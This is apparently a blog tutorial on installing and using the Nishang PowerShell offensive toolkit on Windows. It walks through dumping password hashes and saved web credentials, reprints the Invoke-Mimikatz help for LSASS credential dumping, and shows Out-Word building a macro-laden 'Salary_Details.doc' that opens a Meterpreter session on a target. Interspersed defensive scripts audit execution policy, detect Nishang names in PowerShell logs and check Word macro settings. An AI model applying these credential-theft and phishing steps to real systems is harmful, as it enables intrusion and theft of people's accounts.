
Hacking In Windows Using Nishang With Windows PowerShell, Like A Boss!

As requested, this is the first post of many I’m doing on “hacking” and “pentesting.” Many admins aren’t comfortable with Linux, or just want to use convenient Windows-based tools, so that’s what we’re going to do. We’ll talk about a tool called Nishang, which you can use to perform many different pentesting and security auditing techniques using Windows PowerShell 3.0.

To get started, you will need to download Nishang. You can click here to go directly to the GitHub page or click the link below to download the latest version directly. First, here’s a video the creator of Nishang gave at Defcon 21.

Download & Install

Click here to download the latest version of Nishang from GitHub (master.zip).

Once you’ve downloaded the zip file, extract it, rename the folder to nishang.ps and put it in the root of your C: drive.

[Screenshot: the extracted nishang.ps folder at the root of the C: drive]

Open the Windows PowerShell command prompt as Administrator. On Windows 10, click the Start button and type “powershell”, then right-click and select “Run as Administrator.”

Quick Tip: PowerShell 3.0 is installed by default on Windows 10. If you are running an older version of Windows, click here to find out how to download and install PowerShell 3.0. If you have an older version of Windows, like Windows 7, you will need to do a Shift + Right-Click to get the option to Run as Administrator.

After you’re at the bright blue command prompt, navigate to the nishang.ps folder on the root of your C: drive. Using the full path works from whatever directory the prompt starts in.

cd C:\nishang.ps\

Next, we will run a few commands to allow the Nishang PowerShell scripts to run. Here is a brief rundown of what we’re doing.

  • Set-ExecutionPolicy Unrestricted – Allows unsigned scripts to be executed. This is a machine-wide setting, so revert it (or limit it with -Scope Process) once you are done.
  • Get-ChildItem -Path 'C:\nishang.ps\' -Recurse | Unblock-File – Unblocks all of the PowerShell scripts within the nishang.ps folder. The cmdlet is Unblock-File (singular), and -Recurse is needed because Nishang keeps its scripts in subfolders.
  • Import-Module .\nishang.psm1 – Imports all of the Nishang scripts / modules for use in PowerShell

Note: Select “A” for Yes to All when prompted, after setting the execution policy in the first command.

Set-ExecutionPolicy Unrestricted

Get-ChildItem -Path 'C:\nishang.ps\' -Recurse | Unblock-File

Import-Module .\nishang.psm1
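The three commands above deliberately relax two controls: the execution policy, and the Zone.Identifier stream (the “mark of the web”) that Unblock-File strips from downloaded files. As an added example, not code from the original post or the Nishang project, this PowerShell function reports the effective policy per scope and lists which scripts under a folder still carry that mark; the folder path and the PowerShell 3.0 requirement for Get-Item -Stream are assumptions.

```powershell
# Added example (not from the original post or the Nishang project).
# Reports what the install steps change: the execution policy per scope and which
# scripts in a folder still carry the Zone.Identifier stream (the "mark of the web"
# that Unblock-File removes). Assumes PowerShell 3.0+ for Get-Item -Stream.
function Get-ScriptTrustReport {
    param(
        [Parameter(Mandatory = $true)]
        [string]$Path          # folder to audit; C:\nishang.ps below follows this post's layout
    )

    # Policy by scope (MachinePolicy, UserPolicy, Process, CurrentUser, LocalMachine)
    # and the single effective value PowerShell actually applies.
    $byScope   = Get-ExecutionPolicy -List
    $effective = "$(Get-ExecutionPolicy)"

    # Scripts and modules that still have the Zone.Identifier alternate data stream,
    # i.e. files a default policy such as RemoteSigned would refuse to run unsigned.
    $stillBlocked = Get-ChildItem -Path $Path -Recurse -File -Include *.ps1, *.psm1, *.psd1 |
        Where-Object {
            $null -ne (Get-Item -LiteralPath $_.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue)
        } |
        Select-Object -ExpandProperty FullName

    [PSCustomObject]@{
        EffectivePolicy   = $effective
        PolicyIsWeak      = $effective -in @('Unrestricted', 'Bypass')
        PolicyByScope     = $byScope
        StillBlockedCount = @($stillBlocked).Count
        StillBlocked      = @($stillBlocked)
    }
}

# Run against the folder used in this post, then undo the install-time relaxation once
# testing is over (RemoteSigned re-enables the check on downloaded, unsigned scripts).
Get-ScriptTrustReport -Path 'C:\nishang.ps' | Format-List
# Set-ExecutionPolicy RemoteSigned
```

Running it before and after the Unblock-File step shows the StillBlockedCount drop to zero, which is exactly the change a file-integrity or EDR rule watching Zone.Identifier removals would record.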

 

This is what it should look like in your window so far.

[Screenshot: PowerShell window after running the three commands above]

To see a list of all Nishang modules now available in PowerShell, use Get-Command.

Get-Command -Module nishang

There are quite a few, as you can see. The full output is reproduced below.

PS C:\nishang.ps> Get-Command -Module nishang

CommandType Name Version Source
----------- ---- ------- ------
Function Add-Exfiltration 0.0 nishang
Function Add-Persistence 0.0 nishang
Function Add-RegBackdoor 0.0 nishang
Function Add-ScrnSaveBackdoor 0.0 nishang
Function Base64ToString 0.0 nishang
Function Check-VM 0.0 nishang
Function Copy-VSS 0.0 nishang
Function Create-MultipleSessions 0.0 nishang
Function DNS_TXT_Pwnage 0.0 nishang
Function Do-Exfiltration 0.0 nishang
Function Download 0.0 nishang
Function Download_Execute 0.0 nishang
Function Download-Execute-PS 0.0 nishang
Function Enable-DuplicateToken 0.0 nishang
Function Execute-Command-MSSQL 0.0 nishang
Function Execute-DNSTXT-Code 0.0 nishang
Function Execute-OnTime 0.0 nishang
Function ExetoText 0.0 nishang
Function FireBuster 0.0 nishang
Function FireListener 0.0 nishang
Function Get-Information 0.0 nishang
Function Get-LsaSecret 0.0 nishang
Function Get-PassHashes 0.0 nishang
Function Get-PassHints 0.0 nishang
Function Get-Unconstrained 0.0 nishang
Function Get-WebCredentials 0.0 nishang
Function Get-Wlan-Keys 0.0 nishang
Function Get-WmiShellOutput 0.0 nishang
Function Gupt-Backdoor 0.0 nishang
Function HTTP-Backdoor 0.0 nishang
Function Invoke-ADSBackdoor 0.0 nishang
Function Invoke-BruteForce 0.0 nishang
Function Invoke-CredentialsPhish 0.0 nishang
Function Invoke-Decode 0.0 nishang
Function Invoke-Encode 0.0 nishang
Function Invoke-Interceptor 0.0 nishang
Function Invoke-JSRatRegsvr 0.0 nishang
Function Invoke-JSRatRundll 0.0 nishang
Function Invoke-Mimikatz 0.0 nishang
Function Invoke-MimikatzWDigestDowngrade 0.0 nishang
Function Invoke-Mimikittenz 0.0 nishang
Function Invoke-NetworkRelay 0.0 nishang
Function Invoke-PortScan 0.0 nishang
Function Invoke-PoshRatHttp 0.0 nishang
Function Invoke-PoshRatHttps 0.0 nishang
Function Invoke-PowerShellIcmp 0.0 nishang
Function Invoke-PowerShellTcp 0.0 nishang
Function Invoke-PowerShellUdp 0.0 nishang
Function Invoke-PowerShellWmi 0.0 nishang
Function Invoke-Prasadhak 0.0 nishang
Function Invoke-PSGcat 0.0 nishang
Function Invoke-PsGcatAgent 0.0 nishang
Function Invoke-PsUACme 0.0 nishang
Function Out-CHM 0.0 nishang
Function Out-DnsTxt 0.0 nishang
Function Out-Excel 0.0 nishang
Function Out-HTA 0.0 nishang
Function Out-Java 0.0 nishang
Function Out-JS 0.0 nishang
Function Out-RundllCommand 0.0 nishang
Function Out-SCF 0.0 nishang
Function Out-SCT 0.0 nishang
Function Out-Shortcut 0.0 nishang
Function Out-WebQuery 0.0 nishang
Function Out-Word 0.0 nishang
Function Parse_Keys 0.0 nishang
Function Remove-Persistence 0.0 nishang
Function Remove-PoshRat 0.0 nishang
Function Remove-Update 0.0 nishang
Function Run-EXEonRemote 0.0 nishang
Function Show-TargetScreen 0.0 nishang
Function Speak 0.0 nishang
Function Start-CaptureServer 0.0 nishang
Function StringtoBase64 0.0 nishang
Function TexttoEXE 0.0 nishang


Nishang Basics

An entire book could easily be written on the various modules included with Nishang. You can run a script locally to get an idea of what it’s capable of. For instance, let’s start with the Get-Information command. From PowerShell, go ahead and run it.

Get-Information

As you can see, there is an incredible amount of information this module harvests for the attacker. How much will be extracted from the target machine depends on the operating system and what patches have been installed. Penetration testing is an art, and it requires a great deal of trial and error.

To get more specific information, such as password hashes, you can use the Get-PassHashes command. This will dump all of the local account password hashes. You can run it on your machine to get an idea of what it makes available. When executed against a target machine it will provide their password hashes.

Get-PassHashes

Here is a screenshot of this command being run against a Windows 10 workstation with the latest patches installed. The hashes are partially covered for obvious reasons.

[Screenshot: Get-PassHashes output with the hashes partially masked]

Another very useful command is Get-WebCredentials. When this is executed against a target it will dump any saved usernames and passwords used for websites.

Get-WebCredentials

Here is the output of Get-WebCredentials run against a target machine. Identifiable information has been rendered useless, once again, for obvious reasons.

[Screenshot: Get-WebCredentials output with identifying details masked]

As you can see, one of the dumped passwords was from paypal.com. That’s a pretty catastrophic security issue. A majority of people have a bank account tied to their paypal account, and at least a credit card. Not good!
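On the defensive side, the function names listed by Get-Command -Module nishang are what appear in PowerShell script block logging (event ID 4104 in Microsoft-Windows-PowerShell/Operational) whenever these commands run. The following is an added example, not code from the original post or the Nishang project: it scans script-block text for a subset of those names, first over constructed sample blocks and then over the local event log; the indicator subset and the 500-event window are assumptions.

```powershell
# Added example (not from the original post or the Nishang project).
# Flags PowerShell script-block text that references Nishang functions from the
# Get-Command listing above. The live path needs script block logging enabled
# (event ID 4104 in Microsoft-Windows-PowerShell/Operational).
$NishangIndicators = @(   # subset of the names listed by Get-Command -Module nishang
    'Get-Information', 'Get-PassHashes', 'Get-WebCredentials', 'Get-LsaSecret',
    'Invoke-Mimikatz', 'Invoke-PowerShellTcp', 'Out-Word', 'Add-Persistence'
)
# One alternation regex; \b stops e.g. 'Get-Information' matching inside longer names.
$NishangPattern = '\b(' + (($NishangIndicators | ForEach-Object { [regex]::Escape($_) }) -join '|') + ')\b'

function Find-NishangIndicator {
    param(
        [Parameter(Mandatory = $true)][string]$ScriptBlockText,
        [string]$Source = 'inline'
    )
    $hits = [regex]::Matches($ScriptBlockText, $NishangPattern, 'IgnoreCase') |
        ForEach-Object { $_.Value } | Sort-Object -Unique
    if ($hits) {
        [PSCustomObject]@{
            Source     = $Source
            Indicators = @($hits) -join ', '
            Snippet    = $ScriptBlockText.Substring(0, [Math]::Min(80, $ScriptBlockText.Length))
        }
    }
}

# Constructed sample script blocks (not captured events): two suspicious, one benign.
$samples = @(
    'Import-Module .\nishang.psm1; Get-PassHashes',
    'powershell.exe -ExecutionPolicy Bypass -noprofile -Command "Invoke-Mimikatz -DumpCreds"',
    'Get-Process | Where-Object { $_.CPU -gt 100 } | Select-Object Name'
)
$samples | ForEach-Object { Find-NishangIndicator -ScriptBlockText $_ -Source 'sample' }

# Live path: scan recent 4104 events on this host. Properties[2] is the ScriptBlockText field.
function Find-NishangInEventLog {
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object { Find-NishangIndicator -ScriptBlockText $_.Properties[2].Value -Source "RecordId $($_.RecordId)" }
}
Find-NishangInEventLog
```

The first two samples produce a hit each and the third none; on a host where you have just followed this walkthrough, the live path will also surface the Import-Module and Get-PassHashes blocks you ran.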

 

Advanced Usage

Weaponized Word Document

With Nishang’s Out-Word command, you can embed a payload in a weaponized Microsoft Word .doc file that is instructed to download and execute a PowerShell Meterpreter. This is an example of a command to do precisely this. It will create a Word document called “Salary_Details.doc” with the payload embedded.

Out-Word -Payload 'powershell.exe -ExecutionPolicy Bypass -noprofile'

[Screenshot: Out-Word creating Salary_Details.doc]

As soon as the target opens the Word document and clicks Enable Editing, the payload is delivered and you have owned their machine.

[Screenshot: Meterpreter session opened from the Word document]

The attacker now has a command line dropped to the target’s machine. All from a single Word document.
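The document Out-Word builds only gets to run its payload if the recipient’s Word macro settings allow it. As an added example, not code from the original post or the Nishang project, this function reads the Word macro policy values for the Office 16.0 policy key and flags settings that would let such a document run after a single click; the version number, the HKCU policy location and the interpretation of each value are assumptions based on the documented Office policy names.

```powershell
# Added example (not from the original post or the Nishang project).
# Reads the Word macro policy that decides whether a document like the one Out-Word
# builds can run its payload. Assumes the Office 16.0 policy key under HKCU; other
# Office versions use a different version number in the path.
function Get-WordMacroPolicy {
    param([string]$OfficeVersion = '16.0')

    $key   = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\Word\Security"
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue

    # VBAWarnings: 1 = enable all, 2 = disable with notification (the "Enable Content"
    # bar), 3 = disable except digitally signed, 4 = disable all without notification.
    $vba   = if ($props) { $props.VBAWarnings } else { $null }
    $block = if ($props) { $props.BlockContentExecutionFromInternet } else { $null }

    $findings = @()
    if ($null -eq $vba) {
        $findings += 'VBAWarnings not enforced by policy: the user decides with one click'
    } elseif ($vba -eq 1) {
        $findings += 'VBAWarnings=1: all macros run without any prompt'
    } elseif ($vba -eq 2) {
        $findings += 'VBAWarnings=2: macros run after the user clicks Enable Content'
    }
    if ($block -ne 1) {
        $findings += 'BlockContentExecutionFromInternet not set to 1: downloaded or mailed documents are not blocked outright'
    }

    [PSCustomObject]@{
        PolicyKey                         = $key
        VBAWarnings                       = $vba
        BlockContentExecutionFromInternet = $block
        Findings                          = $findings
        Hardened                          = (@($findings).Count -eq 0)
    }
}

Get-WordMacroPolicy | Format-List
```

A host that reports Hardened = True (VBAWarnings 3 or 4 plus BlockContentExecutionFromInternet = 1) never shows the user the choice that the screenshot above depends on.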

 

Nishang Help Files

Every command included with Nishang includes a PowerShell help file. This is incredibly useful. I suggest running the help command against every included command as there is a wealth of useful information. Included is a description, synopsis, available parameters, syntax, notes, and website links with additional information.

To get help with a particular command, use the Get-Help command. In this example, we will read the help file on the Invoke-Mimikatz command.

Get-Help Invoke-Mimikatz

As you can see, there is quite a bit of useful information provided.

PS C:\> Get-Help Invoke-Mimikatz -full

Do you want to run Update-Help?
The Update-Help cmdlet downloads the most current Help files for Windows PowerShell modules, and installs them on your
computer. For more information about the Update-Help cmdlet, see http://go.microsoft.com/fwlink/?LinkId=210614.
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"):

NAME
Invoke-Mimikatz

SYNOPSIS
This script loads Mimikatz completely in memory.
SYNTAX
Invoke-Mimikatz [[-ComputerName] <String[]>] [[-DumpCreds]] [<CommonParameters>]

Invoke-Mimikatz [[-ComputerName] <String[]>] [[-DumpCerts]] [<CommonParameters>]

Invoke-Mimikatz [[-ComputerName] <String[]>] [[-Command] <String>] [<CommonParameters>]
DESCRIPTION
This script leverages Mimikatz 2.1 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in
memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.

This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell
v2 or higher installed.

Reflectively loads Mimikatz 2.1 in memory using PowerShell. Can be used to dump credentials without writing
anything to disk. Can be used for any
functionality provided with Mimikatz.

The script, in near future, will provide additional commands for a variety of attacks possible with Mimikatz.

Function: Invoke-Mimikatz
Author: Joe Bialek, Twitter: @JosephBialek
Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: [email protected]
Twitter @gentilkiwi
License: http://creativecommons.org/licenses/by/3.0/fr/
Required Dependencies: Mimikatz (included)
Optional Dependencies: None
Mimikatz version: 2.1 alpha (17/02/2016)
PARAMETERS
-ComputerName <String[]>
Optional, an array of computernames to run the script on.

Required? false
Position? 1
Default value
Accept pipeline input? false
Accept wildcard characters? false

-DumpCreds [<SwitchParameter>]
Switch: Use mimikatz to dump credentials out of LSASS.

[output truncated]


Troubleshooting

If you get Permission Denied errors when attempting to install the Nishang scripts, then you have not opened an “Administrative” PowerShell command prompt. This is done by right-clicking the PowerShell shortcut and selecting “Run as Administrator.” On some older versions of Windows, such as Windows 7, you have to hold down Shift + Right-click to get the option to run as administrator.

Conclusion

This guide has taken you through the process of installing Nishang’s PowerShell module and has provided you with some examples of how to use a few of the available tools. There are countless ways this toolkit can be used, and this is really just the tip of the iceberg. I will be publishing additional resources to help guide you through using some more of the available tools in a more in-depth manner. But for now, play around with the available commands and see what’s possible. I have included some links with additional resources below. I implore you to check them out and use Google to find usage examples others have provided. I hope you’ve found this guide helpful, and if you have any questions, please feel free to post in the comments below!

Additional Resources

Nishang Toolkit Homepage – High level overview of modules

https://github.com/samratashok/nishang

Nikhil SamratAshok Mittal’s Blog (Author of Nishang, hundreds of examples)

http://www.labofapenetrationtester.com/